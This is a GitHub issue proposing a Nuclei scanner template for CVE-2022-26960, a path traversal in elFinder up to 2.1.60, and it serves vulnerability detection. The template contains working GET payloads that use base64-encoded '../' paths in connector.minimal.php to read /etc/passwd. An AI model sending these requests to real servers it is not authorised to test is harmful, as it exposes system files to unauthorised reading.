### ISSUE TITLE
CVE-2022-26960 RCE in elFinder <2.1.61

### ISSUE THREAD

**Issue by akincibor** [projectdiscovery/nuclei-templates#4091]
### Template Information:

https://www.synacktiv.com/publications/elfinder-the-story-of-a-repwning.html

### Nuclei Template:

```yaml
id: CVE-2022-26960

info:
  name: Studio-42 elFinder RCE <2.1.61
  author: akincibor
  severity: critical
  description: connector.minimal.php in std42 elFinder through 2.1.60 is affected by path traversal. This allows unauthenticated remote attackers to read, write, and browse files outside the configured document root. This is due to improper handling of absolute file paths.
  reference:
    - https://www.synacktiv.com/publications/elfinder-the-story-of-a-repwning.html
    - https://nvd.nist.gov/vuln/detail/CVE-2022-26960
  tags: cve,cve2022,rce,unauth,elfinder

requests:
  - method: GET
    path:
      - "{{BaseURL}}/elfinder/php/connector.minimal.php?cmd=file&target=l1_<@base64>/var/www/html/elfinder/files//..//..//..//..//..//../etc/passwd<@/base64>&downLoad=1"
      - "{{BaseURL}}/elfinder/php/connector.minimal.php?cmd=file&target=l1_<@base64>.//..//..//..//..//..//../etc/passwd<@/base64>&downLoad=1"

    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: regex
        regex:
          - "root:.*:0:0:"
        part: body
```
